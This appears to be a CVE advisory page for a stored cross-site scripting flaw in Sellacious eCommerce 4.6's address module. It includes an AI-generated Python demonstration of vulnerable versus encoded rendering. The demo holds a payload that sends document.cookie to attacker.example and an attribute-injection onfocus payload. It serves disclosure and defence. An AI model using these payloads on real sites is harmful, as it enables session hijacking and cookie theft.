CVE-2020-37003
Description
Sellacious eCommerce 4.6 contains a persistent cross-site scripting vulnerability in the Manage Your Addresses module that allows attackers to inject malicious scripts. Attackers can exploit multiple address input fields like full name, company, and address to execute persistent script code that can hijack user sessions and manipulate application modules.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Sellacious eCommerce 4.6 has a persistent XSS in the Manage Your Addresses module, allowing attackers to inject scripts via address fields to hijack sessions and manipulate modules.
Vulnerability
Overview
Sellacious eCommerce 4.6 contains a persistent (stored) cross-site scripting (XSS) vulnerability in the Manage Your Addresses module [1][2]. The root cause is that user-supplied values in multiple address fields, including full name, first name, middle name, last name, company, and address, are accepted without adequate validation and later written into the page without output encoding [1][2]. An attacker can therefore submit arbitrary HTML and JavaScript that is stored server-side and executed in the browser of anyone for whom the address record is rendered in the application's user interface [1][2].
Exploitation
An attacker first registers a low-privileged (guest-level) user account [1][2]. They then submit a crafted POST request to the address form, placing script code in any of the vulnerable address input fields [2]. Because the payload is stored rather than reflected, it executes every time the address is displayed, so it affects every user whose browser renders the compromised record, including any higher-privileged user who later views it [1][2].
Impact
Successful exploitation enables an attacker to hijack active user sessions, conduct persistent phishing attacks, redirect users to malicious external sites, and manipulate affected application modules [1][2][4]. The attack does not require high privileges, making it accessible to any registered user [1].
Mitigation
The vulnerability was publicly disclosed in May 2020 [1][2]. No official patch has been confirmed. Until one is available, operators should apply context-aware output encoding (HTML entity encoding for element content and quoted attribute values) wherever stored address fields are rendered, in both storefront and administrative views, and enforce server-side allow-list validation and length limits on the name, company, and address fields [1][2][4]. Validation alone is not sufficient, because attribute-context payloads need no angle brackets; encoding at render time is the control that actually prevents execution. Marking session cookies HttpOnly limits, but does not eliminate, the session-hijacking impact of any residual XSS.
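The following is an added, self-contained Python illustration of the exploitation and mitigation described above; it is not Sellacious code (the product's own implementation is not shown on this page). It renders a stored address record two ways: the vulnerable pattern of concatenating stored values straight into HTML, and a hardened version that HTML-encodes each value at render time. The malicious payloads, the sample address data, the field names, and the allow-list regular expressions are all constructed for this example and are not taken from the advisory. The second payload deliberately contains no angle brackets, to show why an input filter for `<script>` alone would miss an attribute-context injection when the edit form is re-populated.

```python
"""Stored XSS in address fields: vulnerable rendering beside a hardened one.

Illustrative example only, not the application's code. All sample data and
payloads below are constructed for this demonstration.
"""
import html
import re
from html.parser import HTMLParser

FIELDS = ("full_name", "company", "address")

# Constructed sample records, as a low-privileged user might submit them.
BENIGN_ADDRESS = {
    "full_name": "Ada Lovelace",
    "company": "Analytical Engines Ltd.",
    "address": "12 St James's Square, London",
}
MALICIOUS_ADDRESS = {
    # Element-context payload: runs when the value is placed between tags.
    "full_name": "Ada <script>document.location='https://attacker.example/?c='+document.cookie</script>",
    # Attribute-context payload: no angle brackets, so a "<" filter misses it;
    # it closes value="..." and adds an event handler in the edit form.
    "company": '" autofocus onfocus="alert(document.domain)" x="',
    "address": "12 St James's Square, London",
}


def render_address_vulnerable(addr: dict) -> str:
    """The bug pattern: stored values concatenated directly into HTML."""
    return (
        f"<div class='address'>"
        f"<span class='name'>{addr['full_name']}</span>"
        f"<span class='company'>{addr['company']}</span>"
        f"<span class='street'>{addr['address']}</span>"
        f"</div>"
        f"<input type='text' name='company' value=\"{addr['company']}\">"
    )


def render_address_safe(addr: dict) -> str:
    """Hardened: encode at render time. html.escape(quote=True) encodes
    & < > " ' so the value is inert in element content and in a quoted
    attribute alike."""
    e = {k: html.escape(str(v), quote=True) for k, v in addr.items()}
    return (
        f"<div class='address'>"
        f"<span class='name'>{e['full_name']}</span>"
        f"<span class='company'>{e['company']}</span>"
        f"<span class='street'>{e['address']}</span>"
        f"</div>"
        f"<input type='text' name='company' value=\"{e['company']}\">"
    )


# Server-side allow-list validation (defence in depth, not a substitute for
# encoding). These rules are assumptions for the example.
_NAME_RE = re.compile(r"^[\w .,'&()-]{1,100}$")
_ADDRESS_RE = re.compile(r"^[\w .,'#/()-]{1,200}$")


def validate_address(addr: dict) -> list:
    """Return the names of fields that fail the allow-list (empty = accepted)."""
    errors = []
    for field in FIELDS:
        pattern = _ADDRESS_RE if field == "address" else _NAME_RE
        if not pattern.fullmatch(addr.get(field, "")):
            errors.append(field)
    return errors


class _ActiveContentFinder(HTMLParser):
    """Records <script> elements and on* event-handler attributes that the
    browser would actually see. Using a real parser, rather than a regex
    over the text, is what lets it tell an encoded "onfocus=" inside an
    attribute value apart from a live attribute."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"{tag}@{name}")


def find_active_content(rendered: str) -> list:
    """Parse rendered HTML and list script tags / event handlers present."""
    finder = _ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("vulnerable:", find_active_content(render_address_vulnerable(MALICIOUS_ADDRESS)))
    print("hardened:  ", find_active_content(render_address_safe(MALICIOUS_ADDRESS)))
    print("validation:", validate_address(MALICIOUS_ADDRESS))
```

Run against the malicious record, the vulnerable renderer yields both a live script element and an `onfocus` handler on the re-populated input, while the hardened renderer yields neither; the validator rejects the two injected fields as a second, independent layer. The parser-based check is used here only to compare the two outputs and is not a sanitizer.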
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: =4.6 (Sellacious eCommerce version 4.6 only)
Patches
No patches discovered yet.
References (5)
News mentions (0)
No linked articles in our index yet.